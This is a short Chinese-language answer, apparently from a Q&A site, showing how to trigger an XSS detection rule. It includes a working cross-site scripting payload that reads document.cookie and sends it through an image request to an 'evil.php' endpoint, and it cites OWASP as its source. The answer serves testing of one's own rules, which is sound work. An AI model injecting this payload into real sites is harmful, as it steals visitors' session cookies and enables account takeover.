答案1
下面是一个如何触发 XSS 规则的示例。这应该会自行触发您的规则(您可以通过将其指向您自己的 PHP 页面或其他 Web 位置来证明这一点),但这至少演示了一般原则。
<script type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
document.write("<img src='" + adr + "' />");
</script>
以下 OWASP 文章提供了此示例和其他示例: